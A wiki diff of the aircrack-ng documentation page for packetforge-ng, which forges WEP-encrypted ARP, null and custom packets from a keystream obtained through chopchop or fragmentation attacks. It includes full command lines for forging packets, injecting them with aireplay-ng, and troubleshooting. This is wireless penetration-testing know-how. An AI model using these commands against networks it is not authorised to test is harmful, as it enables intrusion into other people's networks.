User Tools

Site Tools


packetforge-ng

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision
Previous revision
packetforge-ng [2007/01/25 01:24]
darkaudax created
packetforge-ng [2010/08/22 20:59] (current)
mister_x update "Usage" and fixed "mode" rendering
Line 3: Line 3:
  
 ===== Description ===== ===== Description =====
-The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. ​ You may create various types of packets such as arp requests, UDP, ICMP and custom packets. ​ The most common use is to create ​arp requests for subsequent injection.+The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets. ​ The most common use is to create ​ARP requests for subsequent injection.
  
-To create an encrypted packet, you must have a PRAGA (pseudo random genration algorithm) file.  This is used to encrypt the packet you create. ​ This is typically obtained from [[aireplay-ng]] chopchop or fragmentation attacks.+To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create. ​ This  is typically obtained from [[aireplay-ng]] ​[[korek_chopchop|chopchop]] or [[fragmentation]] attacks.
  
 ===== Usage ===== ===== Usage =====
 Usage: packetforge-ng <​mode>​ <​options>​ Usage: packetforge-ng <​mode>​ <​options>​
  
-  ​Forge options:+====Forge options====
  
       *-p <​fctrl> ​    : set frame control word (hex)       *-p <​fctrl> ​    : set frame control word (hex)
Line 20: Line 20:
       *-e             : disables WEP encryption       *-e             : disables WEP encryption
       *-k <​ip[:​port]>​ : set Destination IP [Port]       *-k <​ip[:​port]>​ : set Destination IP [Port]
-      *-l <​ip[:​port]>​ : set Source ​     IP [Port]+      *-l <​ip[:​port]>​ : set Source ​     IP [Port] ​(Dash lowercase letter L)
       *-t ttl         : set Time To Live       *-t ttl         : set Time To Live
       *-w <​file> ​     : write packet to this pcap file       *-w <​file> ​     : write packet to this pcap file
  
-  ​Source options:+====Source options====
  
       *-r <​file> ​     : read packet from this raw file       *-r <​file> ​     : read packet from this raw file
       *-y <​file> ​     : read PRGA from this file       *-y <​file> ​     : read PRGA from this file
  
-  ​Modes:+====Modes ==== 
 + 
 +      *-''''​-arp ​         : forge an ARP packet ​   (-0) 
 +      *-''''​-udp ​         : forge an UDP packet ​   (-1) 
 +      *-''''​-icmp ​        : forge an ICMP packet ​  ​(-2) 
 +      *-''''​-null ​        : build a null packet (-3) 
 +      *-''''​-custom ​      build a custom packet ​ (-9)
  
-      *--arp ​         : forge an ARP packet ​   (-0) 
-      *--udp ​         : forge an UDP packet ​   (-1) 
-      *--icmp ​        : forge an ICMP packet ​  (-2) 
-      *--custom ​      : build a custom packet ​ (-9) 
  
 ===== Usage Example ===== ===== Usage Example =====
  
 +==== Generating an arp request packet ====
 Here is an example of how to generate an arp request packet. Here is an example of how to generate an arp request packet.
  
-First, obtain a xor file (PRAGA) with either the aireplay-ng chopchop or fragmentation method.+First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method.
  
 Then use the following command: Then use the following command:
  
-packetforge-ng -0 -a 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​AB:​CB:​9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request+  ​packetforge-ng -0 -a 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​AB:​CB:​9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
  
 Where: Where:
Line 50: Line 53:
   *-a 00:​14:​6C:​7E:​40:​80 is the Access Point MAC address   *-a 00:​14:​6C:​7E:​40:​80 is the Access Point MAC address
   *-h 00:​0F:​B5:​AB:​CB:​9D is the source MAC address you wish to use   *-h 00:​0F:​B5:​AB:​CB:​9D is the source MAC address you wish to use
-  *-k 255.255.255.255 is the destination IP.  IE In an arp it is the "Who has this IP" +  *-k 192.168.1.100 is the destination IP.  IE In an arp it is the "Who has this IP" 
-  *-l 255.255.255.255 is the source IP.  IE In an arp is the "Tells this IP"+  *-l 192.168.1.is the source IP.  IE In an arp it is the "Tell this IP"
   *-y fragment-0124-161129.xor   *-y fragment-0124-161129.xor
   *-w arp-packet   *-w arp-packet
Line 60: Line 63:
  
 The results look like this: The results look like this:
-Total number of packets read             1 +  ​Total number of packets read             1 
-Total number of WEP data packets ​        1 +  Total number of WEP data packets ​        1 
-Total number of WPA data packets ​        0 +  Total number of WPA data packets ​        0 
-Number of plaintext data packets ​        0 +  Number of plaintext data packets ​        0 
-Number of decrypted WEP  packets ​        1 +  Number of decrypted WEP  packets ​        1 
-Number of decrypted WPA  packets ​        0+  Number of decrypted WPA  packets ​        0
  
 To view the packet that was just decrypted, enter "​tcpdump -n -vvv -e -s0 -r arp-request-dec"​ To view the packet that was just decrypted, enter "​tcpdump -n -vvv -e -s0 -r arp-request-dec"​
  
 The results look like this: The results look like this:
-reading from file arp-request-dec,​ link-type EN10MB (Ethernet) +  ​reading from file arp-request-dec,​ link-type EN10MB (Ethernet) 
-18:​09:​27.743303 00:​0f:​b5:​ab:​cb:​9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1+  18:​09:​27.743303 00:​0f:​b5:​ab:​cb:​9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1
  
-Which is exactly what we expected. ​ Now you can inject this arp request packet as follows "​aireplay-ng -2 -r arp-request ath0".+Which is exactly what we expected. Now you can inject this arp request packet as follows "​aireplay-ng -2 -r arp-request ath0".
  
 The program will respond as follows: The program will respond as follows:
  
         Size: 68, FromDS: 0, ToDS: 1 (WEP)         Size: 68, FromDS: 0, ToDS: 1 (WEP)
 +  ​
              ​BSSID ​ =  00:​14:​6C:​7E:​40:​80              ​BSSID ​ =  00:​14:​6C:​7E:​40:​80
          Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF          Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF
         Source MAC  =  00:​0F:​B5:​AB:​CB:​9D         Source MAC  =  00:​0F:​B5:​AB:​CB:​9D
 +  ​
         0x0000: ​ 0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......         0x0000: ​ 0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
         0x0010: ​ ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......         0x0010: ​ ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
Line 88: Line 91:
         0x0030: ​ 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :​.....gC.V$.....         0x0030: ​ 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :​.....gC.V$.....
         0x0040: ​ d64f b709                                .O..         0x0040: ​ d64f b709                                .O..
 +  ​
 +  Use this packet ? y
 +  ​
 +  Saving chosen packet in replay_src-0124-163529.cap
 +  You should also start airodump-ng to capture replies.
 +  End of file.
  
-Use this packet ? y+By entering "y" above, the packet you created with packetforge-ng is then injected.
  
-Saving chosen packet in replay_src-0124-163529.cap 
-You should also start airodump-ng to capture replies. 
  
-End of file.+==== Generating a null packet ====
  
-By entering ​"y" ​above, the packet you created ​with packetforge-ng is then injected.+This option allows you to generate LLC null packets. ​ These are the smallest possible packets and contain no data.  The switch ​"-s" ​is used to manually set the size of the packet. ​ This a simple way to generate small packets for injection. 
 + 
 +Remember that the size value (-s) defines the absolute size of an unencrypted packetso you need to add 8 bytes to get its final length after encrypting it (4 bytes for iv+idx and 4 bytes for icv). This value also includes ​the 802.11 header with a length of 24bytes. 
 + 
 +The command is: 
 + 
 +   ​packetforge-ng --null -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor 
 + 
 +Where: 
 +  * --null means generate a LLC null packet (requires double dash). 
 +  * -s 42 specifies the packet length to be generated. 
 +  * -a BSSID is the MAC address of the access point. 
 +  * -h SMAC is the source MAC address of the packet to be generated. 
 +  * -w short-packet.cap is the name of the output file. 
 +  * -y fragment.xor is the name of the file containing the PRGA. 
 + 
 + 
 +==== Generating a custom ​packet ​==== 
 +If you want to generate a customer packet, first create a packet ​with the tool of your choice. ​ This could be a specialized tool, a hex editor or even from a previous capture. ​ Then save it as a pcap file.  Following this, run the command: 
 + 
 +   packetforge-ng ​-9 -r input.cap -y keystream.xor -w output.cap 
 + 
 +Where: 
 +  * -9 means generate a custom packet. 
 +  * -r input.cap ​is the input file. 
 +  * -y keystream.xor is the file containing the PRGA. 
 +  * -w output.cap is the output file. 
 + 
 +When it runs, packetforge-ng will ask you which packet to use and then output the file. 
 + 
 + 
 + 
 +===== Usage Tips ===== 
 + 
 +Most access points really don't care what IPs are used for the arp request. ​ So as a result you can use 255.255.255.255 for source and destination IPs. 
 + 
 +So the packetforge-ng command becomes: 
 +   ​packetforge-ng -0 -a 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​AB:​CB:​9D -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request 
 + 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +==== Including both -j and -o flags ==== 
 + 
 +A common mistake people make is to include either or both -j and -o flags and create invalid packets. ​ These flags adjust the FromDS and ToDS flages in the packet generated. ​ Unless you are doing something special and really know what you are doing, don't use them.  In general, they are not needed. 
 + 
 + 
 +==== Error message "Mode already specified"​ ==== 
 + 
 +This is commonly caused by using the number one (-1) instead of dash lowercase L (-l) in the command. 
 + 
 +Entering: 
 +   ​packetforge-ng -0 -a 00:​14:​6C:​7E:​40:​80 -h 00:​09:​5B:​EC:​EE:​F2 -k 255.255.255.255 -1 255.255.255.255 -y 00:​14:​6C:​7E:​40:​80-03-00-14-6C-7E-40-80.xor -w arp-request  
 + 
 +Gives: 
 +   Mode already specified. 
 +   "​packetforge-ng --help"​ for help. 
 + 
 +This because -1 (number one) was used instead of the correct -l (the letter ell).  So simply use "​-l"​.
  
packetforge-ng.1169684670.txt.gz · Last modified: 2007/01/25 01:24 (external edit)